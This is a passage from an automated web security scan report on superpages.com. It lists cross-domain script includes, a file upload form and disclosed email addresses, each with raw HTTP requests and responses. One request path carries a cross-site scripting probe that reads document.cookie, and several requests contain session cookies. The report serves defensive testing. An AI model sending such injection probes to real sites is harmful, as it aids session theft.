Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:05:55 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:55 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="share-container"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...

6.5. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=143D8CEECE171005D85B3D31E8E959E2; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 115257
Date: Thu, 03 Feb 2011 17:05:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<li class="share"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...

6.6. http://www.superpages.com/bp/US/javascript:%20return%20validate()  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/javascript:%20return%20validate()

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bp/US/javascript:%20return%20validate() HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 17:05:37 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:37 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SuperPages.com: Not Found - Please Try Again</title>
<meta http-equiv="Cont
...[SNIP]...
<div class="share-container"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...

6.7. http://www.superpages.com/bp/US/javascript:finishFBReg('http:/www.superpages.com/bp/FinishFBReg')  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/javascript:finishFBReg('http:/www.superpages.com/bp/FinishFBReg')

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bp/US/javascript:finishFBReg('http:/www.superpages.com/bp/FinishFBReg') HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 17:05:49 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:49 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SuperPages.com: Not Found - Please Try Again</title>
<meta http-equiv="Cont
...[SNIP]...
<div class="share-container"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...

6.8. http://www.superpages.com/bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OpenPhones=; SPC=1296748823650-www.superpages.com-30323935-794472; s_lastvisit=1296748870245; s_pv=Business%20Profile; s_dfa=superpagescom; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; web=; shopping=; yp=; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:11:19 GMT
Content-Length: 57654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
<li class="share"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...

6.9. http://www.superpages.com/cities/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /cities/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cities/ HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:31 GMT
Server: Unspecified
Vary: Host
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:31 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Superpages.com: City
...[SNIP]...
<div class="share-container"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...

6.10. http://www.superpages.com/coupons  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /coupons

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coupons HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=935846B8705224F72C259EA0DCC18B40; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 74624
Date: Thu, 03 Feb 2011 17:06:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h
...[SNIP]...
<li class="share"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...

6.11. http://www.superpages.com/vorpal/jabberwocky.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /vorpal/jabberwocky.cgi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /vorpal/jabberwocky.cgi HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 17:06:36 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:36 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SuperPages.com: Not Found - Please Try Again</title>
<meta http-equiv="Cont
...[SNIP]...
<div class="share-container"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...

6.12. http://www.superpages.com/yellowpages/C-Banks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /yellowpages/C-Banks HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:05:59 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:05:59GMT
Content-Length: 43816
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:59 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks in Yellow Pages by SuperPages">
<meta name="desc
...[SNIP]...
<div class="share-container"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...

7. File upload functionality  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:00:23 GMT; Path=/
Set-Cookie: JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:00:23 GMT
Content-Length: 65780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
</iframe>
<input alt="Browse" size="40" type="file" id="filetfb" name="myFile" value="Browse" >
<br />
...[SNIP]...

8. Email addresses disclosed  previous
There are 12 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


8.1. http://www.superpages.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:27 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:27 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td>
...[SNIP]...

8.2. http://www.superpages.com/about/copyright.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /about/copyright.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/copyright.html HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:04 GMT
Server: Unspecified
Vary: Host
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:04 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-e
...[SNIP]...
<td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td>
...[SNIP]...
<br />
Email: dmcanotices@supermedia.com</p>
...[SNIP]...

8.3. http://www.superpages.com/about/privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /about/privacy.html

Issue detail

The following email address was disclosed in the response:

Request

GET /about/privacy.html HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:05 GMT
Server: Unspecified
Vary: Host
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:05 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td>
...[SNIP]...

8.4. http://www.superpages.com/bp/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/

Issue detail

The following email address was disclosed in the response:

Request

GET /bp/ HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:05:55 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:55 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td>
...[SNIP]...

8.5. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:00:23 GMT; Path=/
Set-Cookie: JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:00:23 GMT
Content-Length: 65780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
<td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td>
...[SNIP]...

8.6. http://www.superpages.com/bp/US/javascript:%20return%20validate()  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/javascript:%20return%20validate()

Issue detail

The following email address was disclosed in the response:

Request

GET /bp/US/javascript:%20return%20validate() HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 17:05:37 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:37 GMT;path=/

